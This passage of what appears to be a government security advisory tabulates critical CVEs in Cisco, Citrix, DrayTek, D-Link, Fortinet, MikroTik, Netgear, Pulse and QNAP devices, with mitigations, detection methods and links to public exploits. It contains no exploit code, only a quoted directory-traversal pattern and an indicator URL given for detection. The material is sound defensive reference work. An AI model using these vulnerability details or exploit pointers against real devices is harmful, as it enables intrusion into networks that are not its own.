<p>This vulnerability affects Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers running firmware releases 1.4.2.15 through 1.4.2.20.</p>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;">
<p><u><strong>References</strong></u>&nbsp;</p>

<p><a href="http://www.securityfocus.com/bid/106728">http://www.securityfocus.com/bid/106728</a><br />
<a href="https://seclists.org/bugtraq/2019/Mar/55">https://seclists.org/bugtraq/2019/Mar/55</a><br />
<a href="https://www.exploit-db.com/exploits/46243/">https://www.exploit-db.com/exploits/46243/</a><br />
<a href="https://www.exploit-db.com/exploits/46655/">https://www.exploit-db.com/exploits/46655/</a><br />
<a href="http://seclists.org/fulldisclosure/2019/Mar/61">http://seclists.org/fulldisclosure/2019/Mar/61</a><br />
<a href="http://seclists.org/fulldisclosure/2019/Mar/61">http://packetstormsecurity.com/files/152262/Cisco-RV320-Command-Injection.html</a><br />
<a href="http://seclists.org/fulldisclosure/2019/Mar/61">http://packetstormsecurity.com/files/152305/Cisco-RV320-RV325-Unauthenticated-Remote-Code-Execution.html</a><br />
<a href="http://seclists.org/fulldisclosure/2019/Mar/61">https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject</a></p>
</td>
</tr>
</tbody>
</table>

<p class="text-align-center">&nbsp;</p>

<p class="text-align-center"><strong><em>Table 5: Information on Citrix CVE-2019-19781</em></strong></p>

<table border="1" cellpadding="1" cellspacing="1" class="general-table" style="width: 600px; height: 312px; margin-left: auto; margin-right: auto;">
<thead>
<tr>
<th scope="col">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; &nbsp; &nbsp; Citrix CVE-2019-19781&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; CVSS 3.0: 9.8 (Critical)</th>
</tr>
</thead>
<tbody>
<tr>
<td scope="col" style="text-align: left;">
<p><u><strong>Vulnerability Description&nbsp;</strong></u></p>

<p>An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.</p>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;"><u><strong>Recommended Mitigations</strong></u>&nbsp;
<ul>
<li>Implement the appropriate refresh according to the vulnerability details outlined by vendor: Citrix: Mitigation Steps for CVE-2019-19781.&nbsp;</li>
<li>If possible, only allow the VPN to communicate with known Internet Protocol (IP) addresses (allow-list).</li>
</ul>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;"><u><strong>Detection Methods&nbsp;</strong></u>
<ul>
<li>CISA has developed a free detection tool for this vulnerability: cisa.gov/check-cve-2019-19781: Test a host for susceptibility to CVE-2019-19781.</li>
<li>Nmap developed a script that can be used with the port scanning engine: CVE-2019-19781 – Critix ADC Path Traversal #1893.</li>
<li>Citrix also developed a free tool for detecting compromises of Citrix ADC Appliances related to CVE-2019-19781: Citrix / CVE-2019-19781: IOC Scanner for CVE-2019-19781.</li>
<li>CVE-2019-19781 is commonly exploited to install web shell malware. The National Security Agency (NSA) provides guidance on detecting and preventing web shell malware at https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF and signatures at https://github.com/nsacyber/Mitigating-Web-Shells.</li>
</ul>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;">
<p><u><strong>Vulnerable Technologies and Versions&nbsp;</strong></u></p>

<p>The vulnerability affects the following Citrix product versions on all supported platforms:</p>

<ul>
<li>Citrix ADC and Citrix Gateway version 13.0 all supported builds before 13.0.47.24</li>
<li>NetScaler ADC and NetScaler Gateway version 12.1 all supported builds before 12.1.55.18</li>
<li>NetScaler ADC and NetScaler Gateway version 12.0 all supported builds before 12.0.63.13</li>
<li>NetScaler ADC and NetScaler Gateway version 11.1 all supported builds before 11.1.63.15</li>
<li>NetScaler ADC and NetScaler Gateway version 10.5 all supported builds before 10.5.70.12</li>
<li>Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO all supported software release builds before 10.2.6b and 11.0.3b&nbsp;</li>
</ul>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;">
<p><u><strong>References&nbsp;</strong></u></p>

<p><a href="https://support.citrix.com/article/CTX267027">https://support.citrix.com/article/CTX267027</a></p>
</td>
</tr>
</tbody>
</table>

<p class="text-align-center">&nbsp;</p>

<p class="text-align-center"><strong><em>Table 6: Information on DrayTek CVE-2020-8515</em></strong></p>

<table border="1" cellpadding="1" cellspacing="1" class="general-table" style="width: 600px; height: 312px; margin-left: auto; margin-right: auto;">
<thead>
<tr>
<th scope="col">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;&nbsp; &nbsp;DrayTek CVE-2020-8515&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; CVSS 3.0: 9.8 (Critical)</th>
</tr>
</thead>
<tbody>
<tr>
<td scope="col" style="text-align: left;">
<p><u><strong>Vulnerability Description&nbsp;</strong></u></p>

<p>DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI. This issue has been fixed in Vigor3900/2960/300B v1.5.1.</p>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;"><u><strong>Recommended Mitigations&nbsp;</strong></u>
<ul>
<li>Users of affected models should upgrade to 1.5.1 firmware or later as soon as possible, the updated firmware addresses this issue.</li>
<li>Disable the remote access on your router if you don’t need it.</li>
<li>Disable remote access (admin) and SSL VPN. The ACL does not apply to SSL VPN connections (Port 443) so you should also temporarily disable SSL VPN until you have updated the firmware.</li>
<li>Always back up your config before doing an upgrade.</li>
<li>After upgrading, check that the web interface now shows the new firmware version.</li>
<li>Enable syslog logging for monitoring if there are abnormal events.&nbsp;</li>
</ul>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;"><u><strong>Detection Methods&nbsp;</strong></u>
<ul>
<li>Check that no additional remote access profiles (VPN dial-in, teleworker or LAN to LAN) or admin users (for router admin) have been added.</li>
<li>Check if any ACL (Access Control Lists) have been altered.</li>
</ul>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;"><u><strong>Vulnerable Technologies and Versions&nbsp;</strong></u>
<ul>
<li>This vulnerability affects the Vigor3900/2960/300B before firmware version 1.5.1.</li>
</ul>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;">
<p><u><strong>References&nbsp;</strong></u></p>

<p><a href="https://draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/">https://draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/</a><br />
<a href="http://packetstormsecurity.com/files/156979/DrayTek-Vigor2960-Vigor3900-Vigor300B-Remote-Command-Execution.html">http://packetstormsecurity.com/files/156979/DrayTek-Vigor2960-Vigor3900-Vigor300B-Remote-Command-Execution.html</a><br />
<a href="http://packetstormsecurity.com/files/156979/DrayTek-Vigor2960-Vigor3900-Vigor300B-Remote-Command-Execution.html">https://sku11army.blogspot.com/2020/01/draytek-unauthenticated-rce-in-draytek.html</a></p>
</td>
</tr>
</tbody>
</table>

<p class="text-align-center">&nbsp;</p>

<p class="text-align-center"><em><strong>Table 7: Information on D-Link CVE-2019-16920</strong></em></p>

<table border="1" cellpadding="1" cellspacing="1" class="general-table" style="width: 600px; height: 312px; margin-left: auto; margin-right: auto;">
<thead>
<tr>
<th scope="col">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;D-Link CVE-2019-16920&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; CVSS 3.0: 9.8 (Critical)</th>
</tr>
</thead>
<tbody>
<tr>
<td scope="col" style="text-align: left;">
<p><u><strong>Vulnerability Description&nbsp;</strong></u></p>

<p>Unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when the attacker sends an arbitrary input to a "PingTest" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these are also affected: DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825.</p>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;"><u><strong>Recommended Mitigations&nbsp;</strong></u>
<ul>
<li>Recommendation is to replace affected devices with ones that are currently supported by the vendor. End-of-life devices should not be used.</li>
</ul>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;"><u><strong>Detection Methods&nbsp;</strong></u>
<ul>
<li>HTTP packet inspection to look for arbitrary input to the “ping_test” command&nbsp;</li>
</ul>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;"><u><strong>Vulnerable Technologies and Versions&nbsp;</strong></u>
<ul>
<li>DIR DIR-655C, DIR-866L, DIR-652, DHP-1565, DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-82</li>
</ul>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;">
<p><u><strong>References&nbsp;</strong></u></p>

<p><a href="https://www.kb.cert.org/vuls/id/766427">https://www.kb.cert.org/vuls/id/766427</a><br />
<a href="https://fortiguard.com/zeroday/FG-VD-19-117">https://fortiguard.com/zeroday/FG-VD-19-117</a><br />
<a href="https://medium.com/@80vul/determine-the-device-model-affected-by-cve-2019-16920-by-zoomeye-bf6fec7f9bb3">https://medium.com/@80vul/determine-the-device-model-affected-by-cve-2019-16920-by-zoomeye-bf6fec7f9bb3</a><br />
<a href="https://www.seebug.org/vuldb/ssvid-98079">https://www.seebug.org/vuldb/ssvid-98079</a></p>
</td>
</tr>
</tbody>
</table>

<p class="text-align-center">&nbsp;</p>

<p class="text-align-center"><em><strong>Table 8: Information on Fortinet CVE-2018-13382</strong></em></p>

<table border="1" cellpadding="1" cellspacing="1" class="general-table" style="width: 600px; height: 312px; margin-left: auto; margin-right: auto;">
<thead>
<tr>
<th scope="col">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Fortinet CVE-2018-13382&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;&nbsp; CVSS 3.0: 7.5 (High)</th>
</tr>
</thead>
<tbody>
<tr>
<td scope="col" style="text-align: left;">
<p><u><strong>Vulnerability Description&nbsp;</strong></u></p>

<p>An Improper Authorization vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.8 and 5.4.1 to 5.4.10 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to modify the password of an SSL VPN web portal user via specially crafted HTTP requests.</p>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;"><u><strong>Recommended Mitigations&nbsp;</strong></u>
<ul>
<li>Upgrade to FortiOS versions 5.4.11, 5.6.9, 6.0.5, 6.2.0 or above and/or upgrade to FortiProxy version 1.2.9 or above or version 2.0.1 or above.</li>
<li>SSL VPN users with local authentication can mitigate the impact by enabling Two-Factor Authentication (2FA).</li>
<li>Migrate SSL VPN user authentication from local to remote (LDAP or RADIUS).</li>
<li>Totally disable the SSL-VPN service (both web-mode and tunnel-mode) by applying the following CLI commands: config vpn ssl settings, unset source-interface, end.</li>
</ul>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;"><u><strong>Detection Methods&nbsp;</strong></u>
<ul>
<li>HTTP packet inspection to look for specially crafted packets containing the magic key for the SSL VPN password modification</li>
</ul>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;">
<p><u><strong>Vulnerable Technologies and Versions</strong></u></p>

<p>This vulnerability affects the following products:&nbsp;</p>

<ul>
<li>Fortinet FortiOS 6.0.0 to 6.0.4</li>
<li>Fortinet FortiOS 5.6.0 to 5.6.8</li>
<li>Fortinet FortiOS 5.4.1 to 5.4.10</li>
<li>Fortinet FortiProxy 2.0.0</li>
<li>Fortinet FortiProxy 1.2.8 and below</li>
<li>Fortinet FortiProxy 1.1.6 and below</li>
<li>Fortinet FortiProxy 1.0.7 and below</li>
</ul>

<p>FortiOS products are vulnerable only if the SSL VPN service (web-mode or tunnel-mode) is enabled and users with local authentication.</p>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;">
<p><u><strong>References&nbsp;</strong></u></p>

<p><a href="https://fortiguard.com/psirt/FG-IR-18-389">https://fortiguard.com/psirt/FG-IR-18-389</a><br />
<a href="https://fortiguard.com/psirt/FG-IR-18-389">https://fortiguard.com/advisory/FG-IR-18-389</a><br />
<a href="https://www.fortiguard.com/psirt/FG-IR-20-231">https://www.fortiguard.com/psirt/FG-IR-20-231</a></p>
</td>
</tr>
</tbody>
</table>

<p class="text-align-center">&nbsp;</p>

<p class="text-align-center"><em><strong>Table 9: Information on Mikrotik CVE-2018-14847</strong></em></p>

<table border="1" cellpadding="1" cellspacing="1" class="general-table" style="width: 600px; height: 312px; margin-left: auto; margin-right: auto;">
<thead>
<tr>
<th scope="col">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Mikrotik CVE-2018-14847&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; CVSS 3.0: 9.1 (Critical)</th>
</tr>
</thead>
<tbody>
<tr>
<td scope="col" style="text-align: left;">
<p><u><strong>Vulnerability Description&nbsp;</strong></u></p>

<p>MikroTik RouterOS through 6.42 allows unauthenticated remote attackers to read arbitrary files and remote authenticated attackers to write arbitrary files due to a directory traversal vulnerability in the WinBox interface.</p>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;"><u><strong>Recommended Mitigations&nbsp;</strong></u>
<ul>
<li>Upgrade WinBox and RouterOS and change passwords</li>
<li>Firewall the WinBox port from the public interface and from untrusted networks</li>
</ul>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;"><strong><u>Detection Methods&nbsp;</u></strong>
<ul>
<li>Use export command to see all your configuration and inspect for any abnormalities, such as unknown SOCKS proxy settings and scripts.</li>
</ul>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;">
<p><u><strong>Vulnerable Technologies and Versions&nbsp;</strong></u></p>

<p>This vulnerability affected the following MikroTik products:</p>

<ul>
<li>All bugfix releases from 6.30.1 to 6.40.7</li>
<li>All current releases from 6.29 to 6.42</li>
<li>All RC releases from 6.29rc1 to 6.43rc3</li>
</ul>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;">
<p><u><strong>References</strong></u></p>

<p><a href="https://blog.mikrotik.com/security/winbox-vulnerability.html">https://blog.mikrotik.com/security/winbox-vulnerability.html</a></p>
</td>
</tr>
</tbody>
</table>

<p class="text-align-center">&nbsp;</p>

<p class="text-align-center"><em><strong>Table 10: Information on Netgear CVE-2017-6862</strong></em></p>

<table border="1" cellpadding="1" cellspacing="1" class="general-table" style="width: 600px; height: 312px; margin-left: auto; margin-right: auto;">
<thead>
<tr>
<th scope="col">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;&nbsp; &nbsp; &nbsp; &nbsp;Netgear CVE-2017-6862&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;CVSS 3.0: 9.8 (Critical)</th>
</tr>
</thead>
<tbody>
<tr>
<td scope="col" style="text-align: left;">
<p><u><strong>Vulnerability Description&nbsp;</strong></u></p>

<p>NETGEAR WNR2000v3 devices before 1.1.2.14, WNR2000v4 devices before 1.0.0.66, and WNR2000v5 devices before 1.0.0.42 allow authentication bypass and remote code execution via a buffer overflow that uses a parameter in the administration webapp. The NETGEAR ID is PSV-2016-0261.</p>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;"><u><strong>Recommended Mitigations&nbsp;</strong></u>
<ul>
<li>NETGEAR has released firmware updates that fix the unauthenticated remote code execution vulnerability for all affected products.&nbsp;</li>
</ul>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;"><u><strong>Detection Methods&nbsp;</strong></u>
<ul>
<li>HTTP packet inspection to find any specially crafted packets attempting a buffer overflow through specialized parameters.</li>
</ul>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;">
<p><u><strong>Vulnerable Technologies and Versions&nbsp;</strong></u></p>

<p>This vulnerability affects the following products:</p>

<ul>
<li>WNR2000v3 before version 1.1.2.14</li>
<li>WNR2000v4 before version 1.0.0.66</li>
<li>WNR2000v5 before version 1.0.0.42</li>
<li>R2000</li>
</ul>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;">
<p><u><strong>References&nbsp;</strong></u></p>

<p><a href="https://kb.netgear.com/000038542/Security-Advisory-for-Unauthenticated-Remote-Code-Execution-on-Some-Routers-PSV-2016-0261">https://kb.netgear.com/000038542/Security-Advisory-for-Unauthenticated-Remote-Code-Execution-on-Some-Routers-PSV-2016-0261</a><br />
<a href="https://www.on-x.com/sites/default/files/on-x_-_security_advisory_-_netgear_wnr2000v5_-_cve-2017-6862.pdf">https://www.on-x.com/sites/default/files/on-x_-_security_advisory_-_netgear_wnr2000v5_-_cve-2017-6862.pdf</a><br />
<a href="http://www.securityfocus.com/bid/98740">http://www.securityfocus.com/bid/98740</a></p>
</td>
</tr>
</tbody>
</table>

<p class="text-align-center">&nbsp;</p>

<p class="text-align-center"><em><strong>Table 11: Information on Pulse CVE-2019-11510</strong></em></p>

<table border="1" cellpadding="1" cellspacing="1" class="general-table" style="width: 600px; height: 312px; margin-left: auto; margin-right: auto;">
<thead>
<tr>
<th scope="col">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Pulse CVE-2019-11510&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;&nbsp;CVSS 3.0: 10 (Critical)</th>
</tr>
</thead>
<tbody>
<tr>
<td scope="col" style="text-align: left;">
<p><u><strong>Vulnerability Description&nbsp;</strong></u></p>

<p>In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote attacker can send a specially crafted URI to perform an arbitrary file reading vulnerability.&nbsp;</p>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;"><u><strong>Recommended Mitigations&nbsp;</strong></u>
<ul>
<li>Upgrade to the latest Pulse Secure VPN.</li>
<li>Stay alert to any scheduled tasks or unknown files/executables.</li>
<li>Create detection/protection mechanisms that respond on directory traversal (/../../../) attempts to read local system files.</li>
</ul>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;">
<p><u><strong>Detection Methods&nbsp;</strong></u></p>

<ul>
<li>CISA developed a tool to help determine if IOCs exist in the log files of a Pulse Secure VPN Appliance for CVE-2019-11510: <a href="https://github.com/cisagov/check-your-pulse">cisa.gov/check-your-pulse</a>.</li>
<li>Nmap developed a script that can be used with the port scanning engine: http-vuln-cve2019- 11510.nse #1708.</li>
</ul>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;">
<p><u><strong>Vulnerable Technologies and Versions&nbsp;</strong></u></p>

<p>This vulnerability affects the following Pulse Connect Secure products:</p>

<ul>
<li>9.0R1 to 9.0R3.3</li>
<li>8.3R1 to 8.3R7</li>
<li>8.2R1 to 8.2R12</li>
</ul>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;">
<p><u><strong>References</strong></u>&nbsp;</p>

<p><a href="https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/">https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/</a></p>
</td>
</tr>
</tbody>
</table>

<p class="text-align-center">&nbsp;</p>

<p class="text-align-center"><em><strong>Table 12: Information on Pulse CVE-2021-22893</strong></em></p>

<table border="1" cellpadding="1" cellspacing="1" class="general-table" style="width: 600px; height: 312px; margin-left: auto; margin-right: auto;">
<thead>
<tr>
<th scope="col">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Pulse CVE-2021-22893&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; CVSS 3.0: 10 (Critical)</th>
</tr>
</thead>
<tbody>
<tr>
<td scope="col" style="text-align: left;">
<p><u><strong>Vulnerability Description&nbsp;</strong></u></p>

<p>Pulse Connect Secure 9.0R3/9.1R1 and higher is vulnerable to an authentication bypass vulnerability exposed by the Windows File Share Browser and Pulse Secure Collaboration features of Pulse Connect Secure that can allow an unauthenticated user to perform remote arbitrary code execution on the Pulse Connect Secure gateway. This vulnerability has been exploited in the wild.</p>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;"><u><strong>Recommended Mitigations</strong></u>
<ul>
<li>Updating such systems to PCS 9.1R11.4.</li>
<li>Run the PCS Integrity Assurance utility.</li>
<li>Enable Unauthenticated Request logging.</li>
<li>Enable remote logging.</li>
<li>Pulse Secure has published a Workaround-2104.xml file that contains mitigations to protect against this and other vulnerabilities.</li>
<li>Monitor capabilities in open source scanners.&nbsp;</li>
</ul>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;"><u><strong>Detection Methods&nbsp;</strong></u>
<ul>
<li>Log correlation between the authentication servers responsible for LDAP and RADIUS authentication and the VPN server. Authentication failures in either LDAP or RADIUS logs with the associated VPN logins showing success would be an anomalous event worthy of flagging.</li>
<li>The Pulse Security Check Tool.</li>
<li>A ‘recovery’ file not present in legitimate versions. https://ive-host/dana-na/auth/recover[.]cgi?token=&lt;varies&gt;.</li>
</ul>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;">
<p><u><strong>Vulnerable Technologies and Versions&nbsp;</strong></u></p>

<p>This vulnerability affects Pulse Connect Secure 9.0R3/9.1R1 and higher.</p>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;">
<p><u><strong>References&nbsp;</strong></u></p>

<p><a href="https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/">https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/</a><br />
<a href="https://blog.pulsesecure.net/pulse-connect-secure-security-update/">https://blog.pulsesecure.net/pulse-connect-secure-security-update/</a><br />
<a href="https://kb.cert.org/vuls/id/213092">https://kb.cert.org/vuls/id/213092</a><br />
<a href="https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/">https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/</a><br />
<a href="https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html">https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html</a></p>
</td>
</tr>
</tbody>
</table>

<p class="text-align-center">&nbsp;</p>

<p class="text-align-center"><em><strong>Table 13: Information on QNAP CVE-2019-7192</strong></em></p>

<table border="1" cellpadding="1" cellspacing="1" class="general-table" style="width: 600px; height: 312px; margin-left: auto; margin-right: auto;">
<thead>
<tr>
<th scope="col">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;QNAP CVE-2019-7192&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;CVSS 3.0: 9.8 (Critical)</th>
</tr>
</thead>
<tbody>
<tr>
<td scope="col" style="text-align: left;">
<p><u><strong>Vulnerability Description</strong></u>&nbsp;</p>

<p>This improper access control vulnerability allows remote attackers to gain unauthorized access to the system. To fix these vulnerabilities, QNAP recommend updating Photo Station to their latest versions.</p>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;">
<p><u><strong>Recommended Mitigations&nbsp;</strong></u></p>

<p>Update Photo Station to versions:&nbsp;</p>

<ul>
<li>QTS 4.4.1 Photo Station 6.0.3 and later</li>
<li>QTS 4.3.4-QTS 4.4.0 Photo Station 5.7.10 and later</li>
<li>QTS 4.3.0-QTS 4.3.3 Photo Station 5.4.9 and later</li>
<li>QTS 4.2.6 Photo Station 5.2.11 and later&nbsp;</li>
</ul>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;"><u><strong>Detection Methods&nbsp;</strong></u>
<ul>
<li>N/A</li>
</ul>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;">
<p><u><strong>Vulnerable Technologies and Versions&nbsp;</strong></u></p>

<p>This vulnerability affects QNAP Photo Station versions 5.2.11, 5.4.9, 5.7.10, and 6.0.3 or earlier.</p>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;">
<p><strong>References&nbsp;</strong></p>

<p><a href="https://www.qnap.com/zh-tw/security-advisory/nas-201911-25">https://www.qnap.com/zh-tw/security-advisory/nas-201911-25</a><br />
<a href="https://www.qnap.com/zh-tw/security-advisory/nas-201911-25">http://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html</a></p>
</td>
</tr>
</tbody>
</table>

<p class="text-align-center">&nbsp;</p>

<p class="text-align-center"><em><strong>Table 14: Information on QNAP CVE- 2019-7193</strong></em></p>

<table border="1" cellpadding="1" cellspacing="1" class="general-table" style="width: 600px; height: 312px; margin-left: auto; margin-right: auto;">
<thead>
<tr>
<th scope="col">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; QNAP CVE-2019-7193&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; CVSS 3.0: 9.8 (Critical)</th>
</tr>
</thead>
<tbody>
<tr>
<td scope="col" style="text-align: left;">
<p><strong><u>Vulnerability Description&nbsp;</u></strong></p>

<p>This improper input validation vulnerability allows remote attackers to inject arbitrary code to the system. To fix the vulnerability, QNAP recommend updating QTS to their latest versions.</p>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;">
<p><u><strong>Recommended Mitigations&nbsp;</strong></u></p>

<p>Update QTS to versions:&nbsp;</p>

<ul>
<li>QTS 4.4.1 build 20190918 and later</li>
<li>QTS 4.3.6 build 20190919 and later</li>
</ul>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;"><u><strong>Detection Methods&nbsp;</strong></u>
<ul>
<li>N/A</li>
</ul>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;">
<p><u><strong>Vulnerable Technologies and Versions&nbsp;</strong></u></p>

<p>This vulnerability affects QNAP QTS 4.3.6 and 4.4.1 or earlier.</p>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;">
<p><strong><u>References&nbsp;</u></strong></p>

<p><a href="https://www.qnap.com/zh-tw/security-advisory/nas-201911-25">https://www.qnap.com/zh-tw/security-advisory/nas-201911-25</a><br />
<a href="http://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html">http://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html</a></p>
</td>
</tr>
</tbody>
</table>

<p class="text-align-center">&nbsp;</p>

<p class="text-align-center"><em><strong>Table 15: Information on QNAP CVE-2019-7194</strong></em></p>

<table border="1" cellpadding="1" cellspacing="1" class="general-table" style="width: 600px; height: 312px; margin-left: auto; margin-right: auto;">
<thead>
<tr>
<th scope="col">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;QNAP CVE-2019-7194&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;CVSS 3.0: 9.8 (Critical)</th>
</tr>
</thead>
<tbody>
<tr>
<td scope="col" style="text-align: left;">
